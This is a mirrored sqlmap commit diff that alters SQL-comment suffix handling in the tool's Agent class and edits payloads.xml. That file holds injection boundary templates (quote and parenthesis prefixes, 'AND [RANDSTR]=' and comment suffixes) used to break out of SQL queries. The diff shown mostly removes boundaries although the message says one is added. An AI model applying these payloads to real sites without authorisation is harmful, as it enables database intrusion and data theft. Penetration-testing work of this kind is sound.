mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
Adding a boundary proposed in Issue #564
This commit is contained in:
Miroslav Stampar
parent
7718edac9b
commit
cadbddd607
|
|
@ -229,6 +229,9 @@ class Agent(object):
|
|||
pass
|
||||
|
||||
elif suffix and not comment:
|
||||
if suffix.startswith(GENERIC_SQL_COMMENT):
|
||||
expression += "%s" % suffix
|
||||
else:
|
||||
expression += " %s" % suffix
|
||||
|
||||
return re.sub(r"(?s);\W*;", ";", expression)
|
||||
|
|
|
|||
266
xml/payloads.xml
266
xml/payloads.xml
|
|
@ -229,277 +229,13 @@ Formats:
|
|||
-->
|
||||
|
||||
<root>
|
||||
<!-- Generic boundaries -->
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>)</prefix>
|
||||
<suffix></suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>')</prefix>
|
||||
<suffix></suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'</prefix>
|
||||
<suffix></suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>"</prefix>
|
||||
<suffix></suffix>
|
||||
</boundary>
|
||||
<!-- End of generic boundaries -->
|
||||
|
||||
<!-- WHERE/HAVING clause boundaries -->
|
||||
<boundary>
|
||||
<level>1</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>)</prefix>
|
||||
<suffix>AND ([RANDNUM]=[RANDNUM]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>))</prefix>
|
||||
<suffix>AND (([RANDNUM]=[RANDNUM]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix>)))</prefix>
|
||||
<suffix>AND ((([RANDNUM]=[RANDNUM]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>1</level>
|
||||
<clause>0</clause>
|
||||
<where>1,2,3</where>
|
||||
<ptype>1</ptype>
|
||||
<prefix></prefix>
|
||||
<suffix></suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>1</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>')</prefix>
|
||||
<suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'))</prefix>
|
||||
<suffix>AND (('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>')))</prefix>
|
||||
<suffix>AND ((('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>1</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>'</prefix>
|
||||
<suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>3</ptype>
|
||||
<prefix>')</prefix>
|
||||
<suffix>AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>3</ptype>
|
||||
<prefix>'))</prefix>
|
||||
<suffix>AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>3</ptype>
|
||||
<prefix>')))</prefix>
|
||||
<suffix>AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>3</ptype>
|
||||
<prefix>'</prefix>
|
||||
<suffix>AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>")</prefix>
|
||||
<suffix>AND ("[RANDSTR]"="[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>"))</prefix>
|
||||
<suffix>AND (("[RANDSTR]"="[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>")))</prefix>
|
||||
<suffix>AND ((("[RANDSTR]"="[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>4</ptype>
|
||||
<prefix>"</prefix>
|
||||
<suffix>AND "[RANDSTR]"="[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>5</ptype>
|
||||
<prefix>")</prefix>
|
||||
<suffix>AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>5</ptype>
|
||||
<prefix>"))</prefix>
|
||||
<suffix>AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>5</ptype>
|
||||
<prefix>")))</prefix>
|
||||
<suffix>AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>5</ptype>
|
||||
<prefix>"</prefix>
|
||||
<suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>2</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%')</prefix>
|
||||
<suffix>AND ('%'='</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>3</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%'))</prefix>
|
||||
<suffix>AND (('%'='</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%')))</prefix>
|
||||
<suffix>AND ((('%'='</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>1</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%'</prefix>
|
||||
<suffix>AND '%'='</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>5</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%00')</prefix>
|
||||
<suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix>
|
||||
</boundary>
|
||||
|
||||
<boundary>
|
||||
<level>4</level>
|
||||
<clause>1</clause>
|
||||
<where>1,2</where>
|
||||
<ptype>2</ptype>
|
||||
<prefix>%00'</prefix>
|
||||
<suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
|
||||
<suffix>-- [RANDSTR]</suffix>
|
||||
</boundary>
|
||||
<!-- End of WHERE/HAVING clause boundaries -->
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user